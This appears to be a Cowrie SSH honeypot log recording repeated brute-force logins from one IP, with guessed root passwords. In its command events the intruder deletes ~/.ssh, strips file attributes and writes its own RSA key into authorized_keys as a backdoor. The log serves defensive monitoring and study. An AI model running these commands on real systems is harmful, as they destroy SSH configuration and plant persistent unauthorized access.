{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":47980,"dst_ip":"1.2.3.4","dst_port":22,"session":"51061b3a3c7f","protocol":"ssh","message":"New connection: 103.12.154.87:47980 (1.2.3.4:22) [session: 51061b3a3c7f]","sensor":"my-vps","timestamp":"2025-08-26T07:09:09.846591Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:09:09.848702Z","src_ip":"103.12.154.87","session":"51061b3a3c7f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:09:10.072416Z","src_ip":"103.12.154.87","session":"51061b3a3c7f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T07:09:10.975254Z","src_ip":"103.12.154.87","session":"51061b3a3c7f"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:09:12.203723Z","src_ip":"103.12.154.87","session":"51061b3a3c7f"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":48850,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e144fb46bc4","protocol":"ssh","message":"New connection: 103.12.154.87:48850 (1.2.3.4:22) [session: 2e144fb46bc4]","sensor":"my-vps","timestamp":"2025-08-26T07:09:13.451274Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:09:13.452415Z","src_ip":"103.12.154.87","session":"2e144fb46bc4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:09:15.901459Z","src_ip":"103.12.154.87","session":"2e144fb46bc4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:09:18.917695Z","src_ip":"103.12.154.87","session":"2e144fb46bc4"}
{"eventid":"cowrie.session.closed","duration":"15.1","message":"Connection lost after 15.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:09:19.141665Z","src_ip":"103.12.154.87","session":"8a425aca82af"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:09:19.154042Z","src_ip":"103.12.154.87","session":"2e144fb46bc4"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":44014,"dst_ip":"1.2.3.4","dst_port":22,"session":"898a080a756f","protocol":"ssh","message":"New connection: 103.12.154.87:44014 (1.2.3.4:22) [session: 898a080a756f]","sensor":"my-vps","timestamp":"2025-08-26T07:10:24.806909Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:10:24.811110Z","src_ip":"103.12.154.87","session":"898a080a756f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:10:25.044021Z","src_ip":"103.12.154.87","session":"898a080a756f"}
{"eventid":"cowrie.login.success","username":"root","password":"2023.com","message":"login attempt [root/2023.com] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:10:27.100689Z","src_ip":"103.12.154.87","session":"898a080a756f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:10:27.596738Z","src_ip":"103.12.154.87","session":"898a080a756f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T07:10:27.597469Z","src_ip":"103.12.154.87","session":"898a080a756f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T07:10:27.598774Z","src_ip":"103.12.154.87","session":"898a080a756f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:10:27.814070Z","src_ip":"103.12.154.87","session":"898a080a756f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:10:28.381868Z","src_ip":"103.12.154.87","session":"898a080a756f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T07:10:28.382673Z","src_ip":"103.12.154.87","session":"898a080a756f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T07:10:28.618735Z","src_ip":"103.12.154.87","session":"898a080a756f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:10:28.619651Z","src_ip":"103.12.154.87","session":"898a080a756f"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":46418,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1008c7abdb9","protocol":"ssh","message":"New connection: 103.12.154.87:46418 (1.2.3.4:22) [session: f1008c7abdb9]","sensor":"my-vps","timestamp":"2025-08-26T07:10:28.837011Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:10:28.841732Z","src_ip":"103.12.154.87","session":"f1008c7abdb9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:10:29.063220Z","src_ip":"103.12.154.87","session":"f1008c7abdb9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T07:10:30.531030Z","src_ip":"103.12.154.87","session":"f1008c7abdb9"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:10:31.759939Z","src_ip":"103.12.154.87","session":"f1008c7abdb9"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":47612,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc074dcb7c4b","protocol":"ssh","message":"New connection: 103.12.154.87:47612 (1.2.3.4:22) [session: bc074dcb7c4b]","sensor":"my-vps","timestamp":"2025-08-26T07:10:32.008158Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:10:32.009286Z","src_ip":"103.12.154.87","session":"bc074dcb7c4b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:10:32.245176Z","src_ip":"103.12.154.87","session":"bc074dcb7c4b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:10:33.890230Z","src_ip":"103.12.154.87","session":"bc074dcb7c4b"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:10:34.120182Z","src_ip":"103.12.154.87","session":"898a080a756f"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:10:34.131308Z","src_ip":"103.12.154.87","session":"bc074dcb7c4b"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":42076,"dst_ip":"1.2.3.4","dst_port":22,"session":"1bdda08eec89","protocol":"ssh","message":"New connection: 103.12.154.87:42076 (1.2.3.4:22) [session: 1bdda08eec89]","sensor":"my-vps","timestamp":"2025-08-26T07:11:42.225985Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:11:42.227975Z","src_ip":"103.12.154.87","session":"1bdda08eec89"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:11:42.441215Z","src_ip":"103.12.154.87","session":"1bdda08eec89"}
{"eventid":"cowrie.login.success","username":"root","password":"chris","message":"login attempt [root/chris] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:11:43.290309Z","src_ip":"103.12.154.87","session":"1bdda08eec89"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:11:43.781881Z","src_ip":"103.12.154.87","session":"1bdda08eec89"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T07:11:43.782544Z","src_ip":"103.12.154.87","session":"1bdda08eec89"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T07:11:43.783427Z","src_ip":"103.12.154.87","session":"1bdda08eec89"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:11:44.001624Z","src_ip":"103.12.154.87","session":"1bdda08eec89"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:11:44.454313Z","src_ip":"103.12.154.87","session":"1bdda08eec89"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T07:11:44.455286Z","src_ip":"103.12.154.87","session":"1bdda08eec89"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T07:11:44.689837Z","src_ip":"103.12.154.87","session":"1bdda08eec89"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:11:44.690867Z","src_ip":"103.12.154.87","session":"1bdda08eec89"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":43014,"dst_ip":"1.2.3.4","dst_port":22,"session":"143430d88b62","protocol":"ssh","message":"New connection: 103.12.154.87:43014 (1.2.3.4:22) [session: 143430d88b62]","sensor":"my-vps","timestamp":"2025-08-26T07:11:44.894151Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:11:44.895180Z","src_ip":"103.12.154.87","session":"143430d88b62"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:11:50.309008Z","src_ip":"103.12.154.87","session":"143430d88b62"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:11:50.693731Z","src_ip":"103.12.154.87","session":"143430d88b62"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":45074,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4bdbea2a730","protocol":"ssh","message":"New connection: 103.12.154.87:45074 (1.2.3.4:22) [session: d4bdbea2a730]","sensor":"my-vps","timestamp":"2025-08-26T07:11:50.904376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:11:50.907124Z","src_ip":"103.12.154.87","session":"d4bdbea2a730"}
